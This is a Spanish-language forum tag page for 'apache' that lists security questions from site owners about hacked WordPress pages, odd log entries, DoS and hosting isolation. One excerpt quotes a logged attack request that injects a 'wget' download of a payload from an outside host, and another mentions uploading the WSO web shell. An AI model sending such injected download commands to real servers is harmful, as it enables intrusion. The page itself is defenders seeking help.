Preguntas con etiqueta 'apache'

preguntas con etiqueta
2
respuestas

¿Protegiendo la inyección de código a través de chattr en archivos php?

Recientemente, un sitio web que alojé (un sitio de wordpress) para un amigo fue hackeado y todas las páginas de php habían agregado código en la parte inferior en forma de echo base64_encode(...); . Por lo tanto, hubo anuncios no deseados...
hecha 13.01.2015 - 12:19
3
respuestas

Registros de Apache, registro sospechoso de apach0day

hoy recibí esto 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" así que con HTTP_USER_AGENT: chroot-apach0day REQUEST_URI:...
hecha 28.07.2014 - 21:28
2
respuestas

¿Qué es esta extraña solicitud GET (GET / A0A32579-2767) DoSed my apache?

Tengo apache detrás de nginx en mi servidor web. Hoy mi apache deja de responder a las solicitudes. Las investigaciones muestran esta situación: El número de procesos de apache crece más de 500 pero MaxChildren=256 en config (teng...
hecha 02.11.2014 - 16:54
1
respuesta

¿Estamos bajo el control de hackers?

Tenemos un servidor web que monta Centos. En ese WS hay un Apache (versión 2.2.3) y algunos sitios. Puede iniciar sesión solo si tiene un certificado (para el usuario root) o mediante ftp (una partición restringida de datos para los contenido...
hecha 15.05.2012 - 10:48
1
respuesta

Alojar varios sitios web de forma segura

Sorprendentemente, no pude encontrar ningún tema relacionado aquí, así que voy a poner esto. Tengo varios sitios web que se ejecutan en el mismo servidor, construido con varios CMS y marcos. Necesito aislarlos completamente. Necesito esto porque...
hecha 31.03.2016 - 14:41
2
respuestas

¿Fui víctima de un ataque "Apache PHP Remote Exploit"?

Tengo un servidor en mi computadora para propósitos de prueba, accesible desde el exterior. Estaba revisando el archivo access.log, y vi 89.187.33.50 - - [29/Mar/2014:03:39:01 +0100] "HEAD / HTTP/1.0" 200 - 89.187.33.50 - - [29/Mar/2014:03:...
hecha 29.03.2014 - 21:23
1
respuesta

¿A qué ataques es vulnerable el nuevo Apache 2.0?

Soy nuevo en el campo de Seguridad y todavía estoy aprendiendo cómo funcionan todos los ataques. para mis pruebas, he implementado Apache 2.0 en una máquina virtual Cent OS. He creado otra máquina usando FreeBSD, donde instalé honeyd p...
hecha 29.10.2015 - 11:44
2
respuestas

Si Apache está configurado para analizar PHP, ¿pueden los usuarios ver el código fuente de PHP?

Si Apache está configurado para analizar PHP y no permite indexar archivos, ¿hay otras formas en que los usuarios puedan ver el código fuente de PHP, ya sea con o sin intención?     
hecha 21.12.2013 - 00:10
2
respuestas

¿Ocultar y ocultar las claves de los parámetros de la URL es una protección contra la manipulación?

¿El uso de mod_rewrite hace que la inyección de matriz PHP ( manipulación de claves de parámetros web ) sea imposible cuando las claves son desconocidos (y difíciles de adivinar)? Supongamos que tenemos la siguiente URL: https://exam...
hecha 14.07.2016 - 11:37
1
respuesta

¿Cuál es la mejor manera de bloquear los permisos de acceso al servicio web?

Después de todo lo que hice para proteger mi servidor, subí webshell (Web Shell WSO 2.1) , para ver hasta dónde puede llegar el pirata informático y adivina qué, me sorprendió, porque Fue capaz de leer información muy sensible. Puedoejecuta...
hecha 23.02.2016 - 19:40